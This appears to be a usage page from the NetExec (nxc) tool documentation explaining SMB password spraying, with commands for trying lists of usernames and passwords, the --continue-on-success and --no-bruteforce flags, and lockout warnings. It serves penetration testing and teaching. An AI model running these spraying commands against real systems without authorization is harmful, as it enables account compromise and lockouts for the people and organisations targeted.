Password Spraying
Using Username/Password Lists
You can use multiple usernames or passwords by separating the names/passwords with a space.
nxc smb <TARGET> -u user1 user2 user3 -p <PASSWORD>
nxc smb <TARGET> -u user1 -p <PASSWORD> password2 password3
nxc accepts txt files of usernames and passwords. One user/password per line. Watch out for account lockout!
nxc smb <TARGET> -u <USERFILE> -p <PASSWORD>
nxc smb <TARGET> -u <USERNAME> -p <PASSFILE>
Warning
By default nxc will exit after a successful login is found. Using the --continue-on-success flag, it will continue spraying even after a valid password is found. Useful for spraying a single password against a large user list. This is incompatible with command execution.
Usage example:
nxc smb <TARGET> -u <USERFILE> -p <PASSWORD> --continue-on-success
Checking 'username == password' using wordlist
nxc smb <TARGET> -u <USERFILE> -p <PASSFILE> --no-bruteforce --continue-on-success
Checking multiple usernames/passwords using wordlist
nxc smb <TARGET> -u <USERFILE> -p <PASSFILE>
The result will be:
- user1 => password1
- user1 => password2
- user2 => password1
- user2 => password2
Danger
Be careful to not lock accounts using this technique
Checking one login equal one password using wordlist
Success
No bruteforce possible with this one as 1 user = 1 password
nxc smb <TARGET> -u <USERFILE> -p <PASSFILE> --no-bruteforce --continue-on-success
The result will be:
- user1 => password1
- user2 => password2
Danger
Avoid range or a list of IPs when using the --no-bruteforce option